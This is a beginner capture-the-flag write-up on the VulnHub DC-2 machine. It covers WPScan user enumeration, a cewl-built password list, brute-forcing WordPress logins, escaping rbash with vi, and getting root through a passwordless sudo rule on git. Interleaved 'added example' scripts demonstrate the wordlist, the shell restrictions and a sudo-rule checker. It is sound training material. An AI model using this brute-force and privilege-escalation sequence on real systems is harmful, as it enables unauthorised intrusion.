
PENETRATION TEST REPORT

DC2 VULNHUB

SREERAJ K
Sreeraj898@gmail.com
Table of Contents

Introduction

Active Information Gathering

Vulnerability Scanning

Exploitation

Enumeration and Privilege Escalation

Important Takeaway from this lab


Introduction
The objective is to find the five flags on the DC-2 VM. Each flag is a hint for the
next step; where a flag sits is simply an indicator of where a good penetration
tester should look. An alternative approach is to go straight for root.

Penetration Methodology

• Discovering the target's IP
• Network scanning (Nmap)
• Adding the domain name to the hosts file
• Browsing the HTTP service
• Using WPScan for username enumeration
• Using cewl to create a wordlist
• Logging into WordPress
• Logging in through SSH
• Escaping the restricted shell
• Finding a binary in the sudoers list
• Getting root access and reading the final flag
Active Information Gathering
• Host Discovery and Port scanning

Only two services were running on the victim system: HTTP and SSH, with SSH on a
non-standard port (7744, used for the login later on). A running HTTP service means
there must be a web page. The site is reached by the name dc-2, so that name is
mapped to the target IP in the hosts file before browsing; browsing the website
then gives us our first flag.

The Flag option on the web page clearly got our attention. Let's check what hint
it has for us. This page gives a really good hint for moving ahead.
Vulnerability Scanning
I moved straight to this step because this is my personal lab environment. I used
nmap to look for vulnerabilities in the WordPress web app.

The first idea that came to us was to run WPScan against the web page and see
what the scan enumerates.

The above results gave us two useful pieces of information:

1. File enumeration: /wp-login.php, …, /readme.html

2. User enumeration: admin, tom, jerry
Exploitation
We therefore used cewl to build a password wordlist from the text of the site
itself at http://dc-2/, as shown in the image. cewl spiders the site and writes
out every word it finds, one per line.

cewl http://dc-2/ > password

cat password
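The cewl step can be reproduced offline. The script below is an added example, not part of the original report, that does what cewl does at its core: strip the HTML, split the text into words, keep those of at least the minimum length (cewl's default is 3) and deduplicate. The sample page it reads is constructed here to stand in for http://dc-2/, so the script needs no network access; on a real target you would feed it a saved copy of the site, or simply run cewl.

```shell
#!/bin/sh
# Added example: a minimal cewl-style wordlist builder (not from the report).
# Assumption: SAMPLE_PAGE is a constructed stand-in for the HTML of
# http://dc-2/; it is written to a temp file so the functions below can be
# pointed at any saved page.

SAMPLE_PAGE=$(mktemp)
trap 'rm -f "$SAMPLE_PAGE"' EXIT
cat > "$SAMPLE_PAGE" <<'EOF'
<html><head><title>DC-2 Flag</title></head>
<body>
<h1>Flag</h1>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit.
Parturient montes, nascetur ridiculus mus.</p>
<a href="/wp-login.php">Log in</a>
</body></html>
EOF

# build_wordlist FILE [MINLEN]
# 1. replace HTML tags with spaces, 2. split on anything that is not a
# letter, 3. keep words of at least MINLEN letters, 4. sort and dedupe.
# Case is kept as-is, which is also cewl's default.
build_wordlist() {
    sed -e 's/<[^>]*>/ /g' "$1" \
      | tr -cs 'A-Za-z' '\n' \
      | awk -v min="${2:-3}" 'length($0) >= min' \
      | sort -u
}

# wordlist_size FILE [MINLEN]
# Number of candidate passwords the page yields, i.e. the size of the
# file the report produced with "cewl ... > password".
wordlist_size() {
    build_wordlist "$1" "${2:-3}" | wc -l | tr -d ' '
}

build_wordlist "$SAMPLE_PAGE" 3
```

Because the site text is lorem ipsum, the list contains words such as adipiscing and Parturient; that is exactly why a site-specific wordlist works here where a generic one would not. Raising the minimum length trims the list, but so does dropping a password, so keep it at cewl's default unless the list is unmanageably large.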

Time to fire up WPScan with our username list and password list to find a valid
login combination. The users file holds the three names WPScan enumerated
(admin, tom, jerry).

wpscan --url http://dc-2 -U users -P password

Brute forcing gave us the following results:

1. For admin we only confirmed that the user exists; no password in the list matched.

2. User jerry is valid, and jerry's password is adipiscing.
3. User tom is valid, and tom's password is parturient.
We log in with jerry's and tom's credentials and look for our flags. Traversing
the admin panel, we find flag2.

The clue tells us to find another entry point to reach the final flag, so we try
an SSH login on port 7744 (the non-standard SSH port found by the scan) using tom's
credentials.
ssh tom@192.168.1.6 -p 7744
ls
cat flag3.txt
echo $PATH
ls /home/tom/usr/bin
Enumeration and Privilege Escalation
As you can observe, the cat program is not available: tom's PATH contains only
/home/tom/usr/bin, and he can run only the handful of programs in that directory.

Since we had a restricted shell (rbash), we checked what we could run and found the
vi editor available. We therefore used vi to escape the restricted shell.

After escaping the restricted shell, we export /bin/bash as our SHELL
environment variable and put /bin and /usr/bin back on PATH so that normal Linux
commands resolve again. (SHELL holds a single path, not a colon-separated list,
so it is set outright rather than appended to.)

export PATH=/bin:/usr/bin:$PATH
export SHELL=/bin/bash
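The order matters: the exports only work after the restricted shell has been left, because rbash marks PATH and SHELL read-only and refuses command names containing a slash. The vi escape itself is interactive (the standard route is :set shell=/bin/bash followed by :shell; the report does not show which vi commands it used), so the added example below, which is not part of the original report, reproduces the surrounding behaviour instead: what a restricted bash blocks, why cat was "missing" for tom, and that the fix works once in an unrestricted shell. It assumes bash is installed on the host running it, and uses /home/tom/usr/bin, the directory the report lists, as the stand-in for tom's restricted PATH (the directory need not exist).

```shell
#!/bin/sh
# Added example (not from the original report). Assumptions: bash is
# installed; /home/tom/usr/bin stands in for tom's restricted PATH.

# in_rbash COMMAND
# Run COMMAND under a restricted bash (bash -r, the same restrictions as
# rbash). Exit 0 if it ran, non-zero if restricted mode blocked it.
in_rbash() {
    bash -r -c "$1" >/dev/null 2>&1
}

# with_tom_path COMMAND
# Run COMMAND in a normal bash whose PATH is only tom's private bin dir.
# Reproduces "cat: command not found" even though /bin/cat exists.
with_tom_path() {
    bash -c "PATH=/home/tom/usr/bin; $1" >/dev/null 2>&1
}

# in_fixed_shell COMMAND
# Run COMMAND in a normal bash after the report's fix: /bin and /usr/bin
# back on PATH, SHELL set to one real shell path (not a colon list).
in_fixed_shell() {
    bash -c "export PATH=/bin:/usr/bin:\$PATH; export SHELL=/bin/bash; $1" >/dev/null 2>&1
}

# Demonstration: the three things tom cannot do inside rbash, then the
# effect of the restricted PATH, then the result after the fix.
for cmd in 'cd /' 'export PATH=/bin:/usr/bin:$PATH' '/bin/cat /dev/null'; do
    if in_rbash "$cmd"; then
        echo "rbash allowed : $cmd"
    else
        echo "rbash blocked : $cmd"
    fi
done
if with_tom_path 'cat /dev/null'; then
    echo "tom's PATH    : cat found"
else
    echo "tom's PATH    : cat not found"
fi
if in_fixed_shell 'cat /dev/null'; then
    echo "after the fix : cat works"
else
    echo "after the fix : cat still missing"
fi
```

Run as-is it prints three "rbash blocked" lines, "cat not found" for tom's PATH and "cat works" after the fix. Any editor or pager that can run a subshell (vi here, but also less or man) defeats rbash, which is why a restricted shell on its own is not a security boundary.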

After that, we open flag3.txt again with cat and find the next hint to move
ahead.

ls
cat flag3.txt

According to the hint, we now need to switch user from tom to jerry, but we don't
have jerry's shell login credentials. We then checked the sudoers rules for tom
and found that tom can run /usr/bin/git as root without a password.
sudo -l
Root permission on git was the cherry on the cake, because git can be used to
escalate from a low-privilege shell to a root shell. With root access, we switch
to the root directory and find the final flag.
cd /root
ls
cat final-flag.txt
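The finding that makes this escalation possible is a NOPASSWD sudo rule on a binary that can hand out a shell. On DC-2 that binary is git: git shows its help through a pager, and the pager's ! command starts a shell as the user git is running as, which under sudo is root (for example sudo git -p help config, then !/bin/sh at the less prompt). The report does not show which command it used, so treat that as the standard route rather than the author's. The following added example, not from the report, is the check a practitioner would run over sudo -l output to spot such rules. It runs over a constructed sample resembling tom's sudo -l on DC-2, and its list of escapable binaries is a short hand-picked subset, not an exhaustive one.

```shell
#!/bin/sh
# Added example (not from the original report): flag NOPASSWD sudo rules on
# binaries known to spawn a shell. Assumptions: SAMPLE_SUDO_L is a
# constructed stand-in for tom's "sudo -l" output on DC-2; ESCAPABLE is a
# hand-picked subset of such binaries (GTFOBins has the full set).

SAMPLE_SUDO_L=$(cat <<'EOF'
Matching Defaults entries for tom on DC-2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User tom may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
    (root) /usr/bin/apt-get update
EOF
)

# Binaries whose ordinary features (pager, editor, shell escape, exec)
# yield an interactive shell as the sudo target user.
ESCAPABLE="git vi vim less more man find awk perl python python3 bash sh"

# find_nopasswd_escapes SUDO_L_OUTPUT
# Prints "NAME PATH" for every NOPASSWD rule granted as root (or ALL)
# whose command is in ESCAPABLE, or is the wildcard ALL. Rules that still
# require a password (like apt-get above) are not reported.
find_nopasswd_escapes() {
    printf '%s\n' "$1" | awk -v list="$ESCAPABLE" '
        BEGIN { n = split(list, names, " "); for (i = 1; i <= n; i++) esc[names[i]] = 1 }
        /^[ \t]*\((root|ALL)\)[ \t]+NOPASSWD:/ {
            sub(/.*NOPASSWD:[ \t]*/, "")          # keep only the command list
            m = split($0, cmds, /,[ \t]*/)        # one rule may list several commands
            for (i = 1; i <= m; i++) {
                split(cmds[i], words, " ")        # drop any fixed arguments
                path = words[1]
                k = split(path, comp, "/")
                name = comp[k]                    # basename of the binary
                if (path == "ALL" || (name in esc)) print name, path
            }
        }'
}

find_nopasswd_escapes "$SAMPLE_SUDO_L"
```

On the sample this prints git /usr/bin/git. The remediation is to drop the NOPASSWD rule, or better, the rule itself: a shell-capable binary runnable as root is a root grant no matter how narrowly the intent was described, and pinning fixed arguments does not help when the binary's pager or editor still escapes.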

Conclusion
This was a good step up from the previous box, since we needed to create our own
wordlist for brute forcing with cewl. A perfect VM for beginners. SSH can be served
on ports other than 22; administrators do this to harden their systems, but it is
obscurity rather than security, since a full port scan still finds the service, as
it did here. A directory-enumeration tool like DIRB would help find other accessible
web pages. We touched on sudo -l and privilege-escalation concepts to get root
access.
